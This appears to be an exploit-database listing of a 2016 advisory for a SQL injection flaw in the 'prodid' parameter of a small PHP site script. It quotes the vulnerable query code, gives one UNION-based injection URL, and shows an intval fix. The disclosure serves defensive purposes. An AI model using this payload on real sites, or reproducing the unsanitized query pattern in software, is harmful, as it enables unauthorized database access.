header-logo
Suggest Exploit
vendor:
Simple Dynamic Web Site
by:
lahilote
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Simple Dynamic Web Site
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: xampp
2016

Simple Dynamic Web SQL Injection

The audit_list in /page.php contains a vulnerability to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the web application. This can be done by appending a malicious SQL query to the 'prodid' parameter in the URL. This can allow an attacker to gain access to the database and potentially execute arbitrary code.

Mitigation:

Simple method's use the php function intval.
Source

Exploit-DB raw data:

# Exploit Title.............. Simple Dynamic Web SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A


The audit_list in /page.php

----snip----

	$prodID = $_GET['prodid'];

	if(!empty($prodID)){
		$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
		$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
		$ptitle = $getProdInfo["title"];
		$pdes = $getProdInfo["description"];
		$pimg = $getProdInfo["imgUrl"];
				}

----snip----

Example exploitation
--------------------
http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+

How to fix
----------
Simple method's use the php function intval.
For example

	$prodID = intval($_GET['prodid']);

	if(!empty($prodID)){
		$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
		$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
		$ptitle = $getProdInfo["title"];
		$pdes = $getProdInfo["description"];
		$pimg = $getProdInfo["imgUrl"];
				}


Credits
-------
This vulnerability was discovered and researched by lahilote

References
----------
http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
http://php.net/manual/en/function.intval.php

Navigation

Suggest Exploit

Services By CQR